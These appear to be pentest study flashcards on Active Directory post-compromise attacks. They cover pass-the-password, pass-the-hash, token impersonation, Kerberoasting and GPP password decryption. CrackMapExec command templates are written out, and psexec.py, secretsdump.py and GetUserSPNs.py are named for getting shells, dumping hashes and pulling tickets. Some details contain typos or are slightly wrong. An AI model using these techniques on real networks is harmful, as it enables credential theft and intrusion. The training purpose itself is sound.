Active Directory: Post-Compromise Attacks Flashcards
What is CrackMapExec?
It’s a post-compromise tool for penetration testing against networks. It collects Active Directory information to conduct lateral movements.
What is a Pass the Password Attack?
It’s an attack where the hacker uses obtained passwords to try to authenticate on other machines. With CME, you can try to authenticate to multiple machines in the network and see which one of them you have access with the provided credentials.
What command can be used to perform a Pass the Password attack? What should you look for in the output?
$ crackmapexec smb network_ip/CIDR -u username -d domain.name -p password
After running it, you should look for the machines with the “(Pwn3d!)” result because this indicates that you can authenticate remotely with the provided credentials.
The Pwn3d machines (Pass the password attack)
What tool can be used to get a shell?
psexec.py
The Pwn3d machines (Pass the password attack)
What tool can be used to dump SAM hashes?
secretsdump.py
What is a Pass the Hash attack?
It’s a type of attack where a hacker uses captured password hashes to authenticate to other machines and perform lateral movement in the network.
What command can be used to perform a Pass the Hash attack? What should you look in the output?
$ crackmapexec smb network_ip/CIDR -u username -H hash --local-auth
You should look for machines with the green “[+]” marker or the “(Pwn3d!)” string.
What are the two types of access tokens?
- Delegation Tokens: Tokens that are created when a user interactively login into a system using his credentials.
- Impersonation Tokens: Tokens that are created when a user non-interactively login into a system, so the user is not prompted for credentials. Usually this type of token is created after the delegation ones and uses established credentials from a past interactive authentication.
What is Token Impersonation?
It’s a Windows post-compromise technique that allows an attacker to steal the access token of a logged-on user without knowing his credentials and impersonate him to perform actions with his level of privilege.
What can be achieved with token impersonation?
This technique is effective for privillege escalation and lateral movements, since the attacker can obtain domain admin privilege if a logged-on user is a domain admin and also can use the stolen access token to pivot to other domain machines in the network.
What is the requirement to perform a token impersonation?
The attacker must obtain local admin privileges on the target machine in order to steal its tokens.
For how long is an access token available on a machine?
Until the machine is rebooted.
What is Kerberoasting?
It’s a post-exploitation technique that abuses the Kerberos authentication protocol to request a TGS ticket and crack it offline, avoiding AD account lockouts.
The steps are:
1. Attacker requests a TGT ticket, providing an obtained NLTM hash;
2. Receives the TGT and requests a TGS, presenting the received TGT;
3. Receives the TGS, encripted with the server’s account hash;
4. Proceeds to crack the TGS offline;
Important: These requests (For TGT and TGS) are all made to a domain controller.
Kerberoasting
What tool can be used to grab a TGS?
GetUserSPNs.py
What is GPP and how it can be attacked?
Group Policies Preferences is a toll that provides advanced functionalities to administrators for creating and managing account policies in a Windows domain network. These policies allow the creation of local accounts with embedded credentials for various purposes.
For security, these embedded credentials are encripted with AES and stored as cpassword in a file called Groups.xml, inside the policy folder. The main problem is that the encryption key is publically available, so if an attacker finds this cpassword, he can decrypt it.